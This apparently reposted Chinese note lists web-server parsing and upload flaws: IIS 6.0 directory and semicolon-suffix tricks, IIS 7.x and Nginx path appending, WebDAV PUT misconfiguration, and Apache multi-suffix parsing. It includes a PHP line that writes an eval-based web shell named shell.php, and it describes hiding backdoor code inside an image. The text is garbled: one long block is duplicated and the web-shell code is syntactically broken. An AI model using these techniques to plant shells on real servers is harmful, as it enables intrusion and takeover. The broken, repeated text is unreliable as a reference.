中介軟體漏洞整理
阿新 • • 發佈:2019-02-05
IIS
IIS解析漏洞
IIS 6.0解析利用方法有兩種:
1.目錄解析
建立xx.asp為名稱的資料夾,將asp檔案放入,訪問/xx.asp/xx.jpg,其中xx.jpg可以為任意檔案字尾,即可解析
2.檔案解析
字尾解析:/xx.asp;.jpg /xx.asp:.jpg(此處需抓包修改檔名)
3.預設解析:
/xx.asa,/xx.cer,/xx.cdx
IIS7.5/ IIS 7.0/ Nginx <8.03畸形解析漏洞
IIS 7.5的解析漏洞利用手法,在正常圖片URL後新增 /.php
常用利用方法: 將一張圖和一個寫入後門程式碼的文字檔案合併 將惡意文字寫入圖片的二進位制程式碼之後,避免破壞圖片檔案頭和尾
在當前目錄下就生成了一個php檔案shell.php
IIS PUT漏洞 2個錯誤配置造成 1.WEB伺服器擴充套件裡設定WebDAV為允許; 2.網站許可權配置裡開啟了寫入許可權。 使用桂林老兵的工具 IIS溢位漏洞 開啟WebDAV服務的IIS 6.0被爆存在快取區溢位漏洞導致遠端程式碼執行,針對 Windows Server 2003 R2 Apache 解析漏洞 字尾解析:test.php.x1.x2.x3 Apache將從右至左開始判斷後綴,若x3非可識別字尾,再判斷x2,直到找到可識別字尾為止,然後將該可識別字尾進解析 test.php.x1.x2.x3
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]?>');?>在當前目錄下就生成了一個php檔案shell.php
IIS PUT漏洞 2個錯誤配置造成 1.WEB伺服器擴充套件裡設定WebDAV為允許; 2.網站許可權配置裡開啟了寫入許可權。 使用桂林老兵的工具 IIS溢位漏洞 開啟WebDAV服務的IIS 6.0被爆存在快取區溢位漏洞導致遠端程式碼執行,針對 Windows Server 2003 R2 Apache 解析漏洞 字尾解析:test.php.x1.x2.x3 Apache將從右至左開始判斷後綴,若x3非可識別字尾,再判斷x2,直到找到可識別字尾為止,然後將該可識別字尾進解析 test.php.x1.x2.x3